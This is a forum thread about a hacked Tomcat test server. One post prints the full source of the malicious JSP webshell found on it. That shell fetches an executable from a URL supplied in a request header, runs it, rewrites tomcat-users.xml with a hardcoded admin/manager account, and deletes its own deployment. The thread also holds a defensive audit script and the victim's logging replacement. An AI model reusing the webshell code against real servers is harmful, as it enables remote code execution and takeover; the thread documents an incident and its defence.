
Someone hacked my Tomcat server

    Got a test server for Plan B in the house, it runs on port 8080 and I never really suspected anyone would find it so I made the schoolboy error of not making it safe by removing the management console.

    Had to do an upgrade to the software today and noticed a new web application called fexcepkillshell.war running under it, so I'm like WTF? I never put that there.

    So I stop the server and have a look at the code in it: it hacks the users file, restarts the server, then awaits URL hits which I think tell it to download an exe and run it.

    I don't think it worked, Windows Live care has a few extra 'security events' in the last few days.

    Wake up call really, server is safe now but it shows you never to be complacent.

    #2
    The average life expectancy of an unpatched, unprotected windows box connected to the net is around 10 mins. After that the chances are you will never have complete control of it again.

    Do your config/patching/installs of AV and firewalls *before* you plug in the network cable.
    "Being nice costs nothing and sometimes gets you extra bacon" - Pondlife.



      #3
      Full firewall, AV, all updated.

      They just got in through the tomcat management console because I never switched it off.



        #4
        Originally posted by DaveB
        The average life expectancy of an unpatched, unprotected windows box connected to the net is around 10 mins. After that the chances are you will never have complete control of it again.

        Do your config/patching/installs of AV and firewalls *before* you plug in the network cable.
        There's no such thing as an "unprotected windows box" these days. By default, a clean install of Windows can't connect to anything except Windows update, IIRC (or some similar precaution)... and the Windows firewall is on by default I think.
        You are absolutely right though, when we tried to connect an old PC to our broadband, it couldn't even complete the broadband installation before being swamped with rubbish.
        Originally posted by MaryPoppins
        I'd still not breastfeed a nazi
        Originally posted by vetran
        Urine is quite nourishing



          #5
          It was Windows Defender under a trial I am running of Windows Live Care that caught the exe running and switched it off.

          I am sure they would just continue to push exes towards me, it's tempting to mod the code of the thing and just debug out requests and the IPs of where they are coming from.

          I'm just shocked they found it and also there is a hack written for tomcat.



            #6
            should have gone Linux and you'd have been ok



              #7
              Originally posted by ~Craig~
              should have gone Linux and you'd have been ok
              How is tomcat management console less hackable under Linux?
              Knock first as I might be balancing my chakras.



                #8
                Here is the code if anyone is interested..

                Code:
                <%@ page language="java" pageEncoding="utf-8" import="java.io.*,java.net.*"%>
                <%!
                	String pass=null;
                	String sys=null;
                	
                	String url=null;
                	String filesrc=null;
                		
                public class AutoKill {
                	
                	private String killLoophole(String path) throws Exception
                	{
                		try
                		{
                			String pass=randomPass();
                			FileOutputStream fos=new FileOutputStream(path);
                			String s="<?xml version='1.0' encoding='utf-8'?>\r\n";
                			s=s+"<tomcat-users>\r\n";
                			s=s+"\t<role rolename=\"tomcat\"/>\r\n";
                			s=s+"\t<role rolename=\"role1\" />\r\n";
                			s=s+"\t<role rolename=\"manager\"/>\r\n";
                			s=s+"\t<role rolename=\"admin\"/>\r\n";
                			s=s+"\t<user username=\"admin\" password=\"NetFexc124\" roles=\"admin,manager\"/>\r\n";
                			s=s+"</tomcat-users>";
                			byte[] b=new byte[1024];
                			b=s.getBytes();
                			fos.write(b);
                			fos.close();
                			return pass;
                		}catch(Exception e)
                		{
                			return null;
                		}
                		
                	}
                	
                	private String randomPass()
                	{
                		StringBuffer pass = new StringBuffer(); 
                		int i =0;
                		while(i<5) 
                		{
                		 i=(int)(Math.random()*12);
                		}
                		
                		for(int j=0;j<=i;j++)
                		{
                			char c = (char)(Math.random()* 26 + 'A');
                			pass.append(c);
                		}
                		return pass.toString()+String.valueOf(((int)(Math.random()*10000)));
                	}
                	
                	private boolean clean(String src)
                	{
                		File file=new File(src+".war");
                		if(file.exists())
                			if(file.delete())
                			{
                				return true;
                			}
                		return false;
                	}
                	
                	private boolean downFile(String url,String filesrc)
                	{
                		try
                		{
                		URL urlc = new URL(url);
                		HttpURLConnection con = (HttpURLConnection)urlc.openConnection();
                		con.connect();
                		byte[] b=new byte[1024];
                		BufferedInputStream bis=new BufferedInputStream(con.getInputStream());
                		FileOutputStream fos=new FileOutputStream(filesrc);
                		int length=-1;
                		while((length=bis.read(b,0,b.length))!=-1)
                		{
                			fos.write(b,0,length);
                		}
                		fos.close();
                		bis.close();
                		Process run_proc=Runtime.getRuntime().exec(filesrc);
                		return true;
                		}catch(Exception e)
                		{	
                		}
                		return false;
                	}
                	
                	
                	private boolean exeFile()
                	{
                		boolean afly=false;
                	    if (downFile(url,filesrc))
                	    afly=true;
                		
                		return afly;
                	}
                	
                }
                %>
                <%
                		sys=System.getProperty("os.name");
                		int i=sys.indexOf("Windows");
                		AutoKill ak=new AutoKill();
                		url=request.getHeader("Cache-Vip-Url");
                		if (i>-1)
                		{
                				String result;
                				try
                				{
                					filesrc=request.getSession().getServletContext().getRealPath("")+"/init.exe";
                					if (ak.exeFile())
                					{
                						result="Success! ";
                						pass=ak.killLoophole(System.getProperty("catalina.base")+"/conf/tomcat-users.xml");
                						if(ak.clean(request.getSession().getServletContext().getRealPath("")))
                						result=result+"Undeployed application at context path "+request.getContextPath()+"! ";
                					if (pass!=null)
                						result=result+"After the change password:"+pass+"! ";
                					}
                					else
                					{
                						result="Failure! Down File Failure!";
                					}
                				}catch(Exception e)
                				{
                					result="Failure!throws Exception - "+e.getMessage()+"! ";
                				}
                				request.setAttribute("result",result);
                		}
                		else
                		{
                			request.setAttribute("result","Failure!Because Remote computer system is "+sys+"!");
                		}
                		
                		request.getRequestDispatcher("/ok.jsp").forward(request, response);
                 %>
                PCClient.N was the trojan that was caught.

                I could probably knock up a web spider in a couple of hours that searches for tomcat instances and have a good few bots under my control by the end of the week.

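As an added defender's example (not code from the thread, and not the webshell itself): a small Python audit that looks for the two artefacts the shell above leaves behind, a rewritten tomcat-users.xml granting an unexpected account the manager/admin role, and a webapp or dropped .exe under webapps/ that nobody deployed. It assumes a standard CATALINA_BASE layout; the sample XML is constructed to match what killLoophole() writes.

```python
import os
import xml.etree.ElementTree as ET

# "manager" and "admin" are the roles the shell grants itself; the other two
# are the manager role names used by later Tomcat releases (assumed installed).
PRIVILEGED_ROLES = {"manager", "admin", "manager-gui", "manager-script"}

# Constructed sample: tomcat-users.xml exactly as killLoophole() above writes it.
SHELL_WRITTEN_USERS_XML = (
    "<?xml version='1.0' encoding='utf-8'?>\r\n"
    "<tomcat-users>\r\n"
    "\t<role rolename=\"tomcat\"/>\r\n"
    "\t<role rolename=\"role1\" />\r\n"
    "\t<role rolename=\"manager\"/>\r\n"
    "\t<role rolename=\"admin\"/>\r\n"
    "\t<user username=\"admin\" password=\"NetFexc124\" roles=\"admin,manager\"/>\r\n"
    "</tomcat-users>"
)


def rogue_privileged_users(users_xml, expected_users):
    """Usernames holding a privileged role that the administrator did not create."""
    root = ET.fromstring(users_xml.encode("utf-8"))
    rogue = []
    for user in root.iter("user"):
        roles = {r.strip() for r in user.get("roles", "").split(",")}
        if roles & PRIVILEGED_ROLES and user.get("username") not in expected_users:
            rogue.append(user.get("username"))
    return rogue


def unexpected_webapps(entries, expected_apps):
    """Entries under webapps/ (wars, exploded dirs, binaries) not on the allowlist.
    clean() deletes the shell's own .war after it runs, so the exploded directory
    and the downloaded init.exe are usually what is left to find."""
    found = []
    for name in entries:
        base, ext = os.path.splitext(name)
        if ext.lower() == ".exe" or base not in expected_apps:
            found.append(name)  # an .exe is never legitimate under webapps/
    return found


def audit(catalina_base, expected_users, expected_apps):
    """Run both checks against a real CATALINA_BASE (assumed standard layout)."""
    conf = os.path.join(catalina_base, "conf", "tomcat-users.xml")
    with open(conf, encoding="utf-8") as f:
        users = rogue_privileged_users(f.read(), expected_users)
    apps = unexpected_webapps(os.listdir(os.path.join(catalina_base, "webapps")), expected_apps)
    return {"rogue_users": users, "unexpected_webapps": apps}
```

Any non-empty result from audit() on a box that exposes the manager console is worth treating as a compromise until proven otherwise, since the shell also restarts the server and removes its own deployment.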


                  #9
                  Changed the code to this..

                  Code:
                  <%@ page language="java" pageEncoding="utf-8" import="java.io.*,java.net.*"%>
                  <%
                  
                  System.out.println( "==============================================" ) ;
                  
                  System.out.println( "Cache-Vip-Url: (spyware exe) " + request.getHeader("Cache-Vip-Url") ) ;
                  System.out.println( "IP:                          " + request.getRemoteAddr() ) ;
                  System.out.println( "SERVER:                      " + request.getServerName() ) ;
                  System.out.println( "REQUEST:                     " + request ) ;

                  request.setAttribute("result","Success! ");

                  request.getRequestDispatcher("/ok.jsp").forward(request, response);
                  %>
                  I am fairly sure they will hit on me again, I wonder where the IP will be from?

                  My money is on Russia



                    #10
                    Originally posted by minestrone
                    I am fairly sure they will hit on me again, I wonder where the IP will be from?

                    My money is on Russia
                    They're very unlikely to be coming directly to your machine - there are millions of compromised boxes out there for them to proxy through.

                    EDIT: looks like it's an automated thing.
                    Last edited by NickFitz; 23 March 2009, 16:04.
